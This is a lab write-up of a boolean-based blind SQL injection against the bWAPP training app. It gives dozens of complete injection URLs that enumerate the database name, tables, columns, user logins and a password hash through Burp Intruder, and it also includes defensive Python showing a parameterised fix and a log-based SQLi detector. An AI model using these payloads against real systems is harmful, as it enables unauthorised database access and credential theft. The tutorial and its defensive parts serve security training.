Exploiting Boolean-based blind SQLi

Vishal
Dec 19, 2022


In this post, I will try to exploit a boolean-based blind SQLi. As the name suggests, you will not see any database error; instead, the page content changes depending on whether the injected condition makes the SQL query TRUE or FALSE.

So let’s begin by logging into the bWAPP app and selecting “SQL Injection - Blind - Boolean-Based”.

This will give you a search page where you can search for a movie. Let’s search for Iron Man and see the result. If the movie is present in the database, we get the message “The movie exists in our database!”.

Searching for movie in database

If the movie is not present in the database, it shows “The movie does not exist in our database!”. So the functionality is clear to us.

Now let’s use special characters such as a single or double quote and see whether we receive any message. If I use a single quote I receive “Incorrect syntax detected”, and if I use a double quote it says “The movie does not exist in our database!”. So with a single quote we get some kind of error, but not the full SQL error message we saw in the previous injection techniques.

If I use IRON MAN' AND 1=1 -- it says “The movie exists in our database”, and when I change 1=1 to 1=2 it says “The movie does not exist in our database!”.

This confirms the application is vulnerable to boolean-based blind SQLi. Just to further prove this hypothesis, I used a simple arithmetic condition after AND which is false, “1+1=3”; let’s check this.

False AND statement

Now I will replace it with a condition that is true.

True AND statement.
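To show why those two messages hand an attacker a one-bit oracle, and what removes it, here is an added example that is not bWAPP’s source and not from the post: a hypothetical search handler written the way the post’s target behaves, next to the parameterised version, using Python’s built-in sqlite3 in place of MySQL. The movie rows, the handler shape (`title = '...'`) and the three response strings are assumptions modelled on the behaviour observed above; `has_boolean_oracle` is a small regression check you can point at either handler.

```python
import sqlite3

# Response strings as observed in the post (the third one is what the app
# shows when the injected quote breaks the query).
EXISTS = "The movie exists in our database!"
MISSING = "The movie does not exist in our database!"
ERROR = "Incorrect syntax detected!"


def make_db():
    """Constructed in-memory movie table standing in for bWAPP's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO movies (title) VALUES (?)",
        [("Iron Man",), ("The Dark Knight",), ("Avengers",)],
    )
    return conn


def search_vulnerable(conn, title):
    """Hypothetical handler that concatenates user input into SQL.

    This is the pattern the post exploits: the attacker's quote closes the
    literal, AND <condition> is evaluated by the database, and '-- ' comments
    out the rest of the query.  The page only reveals exists / not-exists,
    but that is enough to read one bit per request.
    """
    sql = f"SELECT COUNT(*) FROM movies WHERE title = '{title}'"
    try:
        (n,) = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ERROR          # unbalanced quote -> syntax error, as in the post
    return EXISTS if n else MISSING


def search_fixed(conn, title):
    """Same feature with a bound parameter.

    The whole input is passed as one string value, so quotes, AND and '--'
    inside it are just characters compared against the title column and
    can never change the query structure.
    """
    (n,) = conn.execute(
        "SELECT COUNT(*) FROM movies WHERE title = ?", (title,)
    ).fetchone()
    return EXISTS if n else MISSING


def has_boolean_oracle(conn, handler, base="Iron Man"):
    """Regression check for this bug class: a handler leaks a boolean oracle
    if a true and a false injected condition produce different responses."""
    true_resp = handler(conn, base + "' AND 1=1 -- ")
    false_resp = handler(conn, base + "' AND 1=2 -- ")
    return true_resp != false_resp


if __name__ == "__main__":
    db = make_db()
    for handler in (search_vulnerable, search_fixed):
        print(handler.__name__)
        for probe in ("Iron Man", "Iron Man'", "Iron Man' AND 1=1 -- ",
                      "Iron Man' AND 1=2 -- ", "Iron Man' AND 1+1=3 -- "):
            print(f"  {probe!r:32} -> {handler(db, probe)}")
        print("  leaks boolean oracle:", has_boolean_oracle(db, handler))
```

Note that the example uses “Iron Man” in the probes because sqlite3 compares strings case-sensitively; the post could type “IRON MAN” because MySQL’s default collation is case-insensitive. The fix is the bound parameter, not the error handling: the hardened handler still returns two different messages for real searches, but no input can make the database evaluate an attacker-chosen condition.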

Let’s try to find the length of the database name and then the name itself. For this I will use Burp Suite’s Repeater and Intruder. First capture the request in Burp and send it to Repeater. Your initial query will look like the one below:

Initial Request in repeater

Now send this request to Intruder, select the 1 as the payload position, increment it up to 15 and keep an eye on the length of each response.

Intruder result

If you look at the response length for payload number 5, it is smaller than for all the others.

The length of database name is of 5 characters.

So the final query is as follows.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON+MAN%27+AND+%28SELECT+LENGTH%28database%28%29%29%29%3D5+--+&action=search

The next task is to find the name of the database; for that we will use the SUBSTRING function along with Burp’s Intruder.

Burp Intruder showing the first character

As you can see, the first character of the database name is “b”. Now in the same way we can find the other 4 characters; keep in mind to adjust the SUBSTRING arguments as required, for example change the length argument from 1 to 2 and, after the equals sign, compare against ‘b’ followed by the candidate character (‘ba’, ‘bb’, and so on).

Second character is w.

After repeating the above steps I was finally able to find all the characters, i.e. the database name, which is “bwapp”.

Request to find the database name

The final query is as follows:

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN%27%20AND%20(SELECT%20SUBSTRING(database(),1%2c5))%3d%27bwapp%27%20--%20%26action%3dsearch

Now we need to find the number of tables in the database “bwapp”. For that we again use Intruder.

Intruder result

This shows that there is a total of 5 tables in the database ‘bwapp’. Now we need to find the length of each table name.

Total number of tables in database ‘bwapp’

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN%27%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d%27bwapp%27)%3d5%20--%20%26action%3dsearch

There are 5 tables in total in the database. Let’s find out the length of each table name, and after that we will find out the names of those tables.

Length of first table name is “5”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%200%2c1)%3d4%20--%20%26action%3dsearch

Length of second table name is “6”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%201%2c1)%3d6%20--%20%26action%3dsearch

Length of third table name is “6”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%202%2c1)%3d6%20--%20%26action%3dsearch

Length of fourth table name is “5”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d5%20--%20%26action%3dsearch

Length of fifth table name is “8”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%204%2c1)%3d8%20--%20%26action%3dsearch

Now let’s find out the name of the first table. The first character of the first table name is ‘b’.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c1)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%200%2c1)%3d%22b%22%20--%20%26action%3dsearch

We just need to modify the above query each time to find all the characters in the table name.

IRON MAN' AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema='bwapp' LIMIT 0,1)="a" -- &action=search

For all the characters we need to change the arguments of the SUBSTRING function. Once that is done, we need to change the arguments of the LIMIT clause appropriately. As we know there is a “users” table (from the previous write-ups), let’s first find which table it is and then try to find all the characters of that table name. I will just put each query here.

From this query I guess that the 5th table is ‘users’.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(table_name)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d5%20--%20%26action%3dsearch

The first character is “u”, as expected.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c1)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22u%22%20--%20%26action%3dsearch

The second character is “s”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c2)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22us%22%20--%20%26action%3dsearch

The third character is “e”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c3)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22use%22%20--%20%26action%3dsearch

The fourth character is “r”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c4)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22user%22%20--%20%26action%3dsearch

The last character is “s”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(table_name%2c1%2c5)%20FROM%20information_schema.tables%20WHERE%20table_schema%3d'bwapp'%20LIMIT%203%2c1)%3d%22users%22%20--%20%26action%3dsearch

This is how you can extract the names of the other tables. Now that we have the table name, let’s first find the total number of columns, then the length of each column name and finally the column names themselves.

Intruder shows there are 9 columns in the users table.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20COUNT(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users')%3d9%20--%20%26action%3dsearch

Length of first column name is “2”.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20LENGTH(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%200%2c1)%3d2%20--%20%26action%3dsearch

In a similar way we can find the length of all the column names by changing the LIMIT clause:

Length of the 2nd column name is 5
Length of the 3rd column name is 8
Length of the 4th column name is 5
Length of the 5th column name is 6
Length of the 6th column name is 15
Length of the 7th column name is 9
Length of the 8th column name is 10
Length of the 9th column name is 5

Let’s try to find out the name of the 3rd column.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c1)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'p'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c2)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pa'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c3)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pas'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c4)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'pass'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c5)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passw'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c6)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passwo'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c7)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'passwor'%20--%20%26action%3dsearch

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20SUBSTRING(column_name%2c1%2c8)%20FROM%20information_schema.columns%20WHERE%20table_schema%3d'bwapp'%20AND%20table_name%3d'users'%20LIMIT%202%2c1)%3d'password'%20--%20%26action%3dsearch

So the name of the 3rd column is ‘password’. The image below shows the names of all the columns.

column names for users table

Now let’s first find out the number of records in the users table.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20COUNT(*)%20FROM%20users%20)%3d2%20--%20%26action%3dsearch

There are only two records in the users table. We are only interested in the login, password and admin columns.

To find the first user’s login I used the query below.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201)LIKE%20'A%25'%20--%20%20%26action%3dsearch

I kept brute-forcing characters after “A” to find the first user’s username, which is “A.I.M.”. The final query looks like this.

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201)LIKE%20'A.I.M.'%20--%20%20%26action%3dsearch

Similarly, for the second user it is bee; the query is

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20login%20FROM%20users%20LIMIT%201,1)LIKE%20'bee%'%20--%20%20%26action%3dsearch

Now that we have the usernames, it’s time to find the passwords. For that I used a list of alphanumeric characters (A-Z, a-z, 0-9), and the query to find the first character is

http://192.168.1.27/bWAPP/sqli_4.php?title=IRON%20MAN'%20AND%20(SELECT%20password%20FROM%20users%20LIMIT%201)LIKE%20'6%'%20--%20%20%26action%3dsearch

After multiple iterations through Burp Intruder I was able to find the hash of the password for user A.I.M., which is “6885858486f31043e5839c735d99457f045affd0”.

The hash for the user bee is the same.
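Seen from the server side, the Intruder runs above leave a distinctive trail: one client, one endpoint, a burst of near-identical requests whose parameter values contain LENGTH(, SUBSTRING(, database() or information_schema plus comment truncation, and responses that fall into only two or three sizes (exists / does not exist / error). The following is an added example, not part of the post, that scans Apache-style access log lines for that pattern. The log lines are constructed, modelled on the post’s /bWAPP/sqli_4.php requests, with made-up client IPs, timestamps and response sizes; the indicator names and the burst threshold are my own choices.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines.  The path and payload shapes follow
# the post; the 192.168.1.50 / 10.0.0.7 clients, timestamps and byte counts
# are invented for the example.
SAMPLE_LOG = """\
192.168.1.50 - - [19/Dec/2022:10:00:01 +0000] "GET /bWAPP/sqli_4.php?title=Iron+Man&action=search HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:00:09 +0000] "GET /bWAPP/sqli_4.php?title=Iron+Man%27&action=search HTTP/1.1" 200 1390 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:00:15 +0000] "GET /bWAPP/sqli_4.php?title=IRON+MAN%27+AND+1%3D1+--+&action=search HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:00:16 +0000] "GET /bWAPP/sqli_4.php?title=IRON+MAN%27+AND+1%3D2+--+&action=search HTTP/1.1" 200 1401 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:01:02 +0000] "GET /bWAPP/sqli_4.php?title=IRON+MAN%27+AND+%28SELECT+LENGTH%28database%28%29%29%29%3D4+--+&action=search HTTP/1.1" 200 1401 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:01:02 +0000] "GET /bWAPP/sqli_4.php?title=IRON+MAN%27+AND+%28SELECT+LENGTH%28database%28%29%29%29%3D5+--+&action=search HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
192.168.1.50 - - [19/Dec/2022:10:01:03 +0000] "GET /bWAPP/sqli_4.php?title=IRON+MAN%27+AND+%28SELECT+SUBSTRING%28database%28%29%2C1%2C1%29%29%3D%27b%27+--+&action=search HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Dec/2022:10:02:00 +0000] "GET /bWAPP/sqli_4.php?title=The+Dark+Knight&action=search HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators of the probing pattern shown in the post, matched against the
# URL-decoded, lower-cased parameter values.  Names are this example's own.
INDICATORS = [
    ("tautology", re.compile(r"'\s*and\s+\d+\s*=\s*\d+")),
    ("length_probe", re.compile(r"length\s*\(")),
    ("substring_probe", re.compile(r"substr(ing)?\s*\(")),
    ("schema_enum", re.compile(r"information_schema|database\s*\(\s*\)")),
    ("comment_truncation", re.compile(r"--\s|#\s*$|/\*")),
]


def parse_line(line):
    """Split one combined-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs already decodes %XX escapes and '+' for us
    rec["params"] = {k: v[0] for k, v in
                     parse_qs(parts.query, keep_blank_values=True).items()}
    rec["size"] = int(rec["size"]) if rec["size"] != "-" else 0
    return rec


def classify(rec):
    """Return the set of indicator names that fire on this request's parameters."""
    hits = set()
    for value in rec["params"].values():
        v = value.lower()
        if v.count("'") % 2 == 1:          # a lone quote closes the SQL literal
            hits.add("unbalanced_quote")
        for name, pat in INDICATORS:
            if pat.search(v):
                hits.add(name)
    return hits


def analyse(log_text, burst_threshold=3):
    """Aggregate flagged requests per (client, path) and report the clients
    that reach burst_threshold.  distinct_sizes is the number of different
    response sizes seen: a small number (exists / not-exists / error) is the
    signature of an application that is usable as a boolean oracle."""
    per_client = defaultdict(lambda: {"count": 0, "indicators": set(), "sizes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hits = classify(rec)
        if not hits:
            continue
        c = per_client[(rec["ip"], rec["path"])]
        c["count"] += 1
        c["indicators"] |= hits
        c["sizes"].add(rec["size"])
    findings = {}
    for (ip, path), c in per_client.items():
        if c["count"] >= burst_threshold:
            findings[ip] = {"path": path, "requests": c["count"],
                            "indicators": sorted(c["indicators"]),
                            "distinct_sizes": len(c["sizes"])}
    return findings


if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_LOG).items():
        print(ip, f)
```

The per-request indicators alone are noisy on real traffic (a film title can legitimately contain a quote), which is why the example only reports a client once several flagged requests hit the same path; on a real Intruder run the count is in the hundreds, and the `=4` / `=5` pairs that differ by one character are the tell-tale of character-by-character enumeration.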

I also tried sqlmap to extract login, password and admin; below is the result.

Command used:

sqlmap to extract data
sqlmap final result

In the next write-up we will cover time-based blind SQL injection.
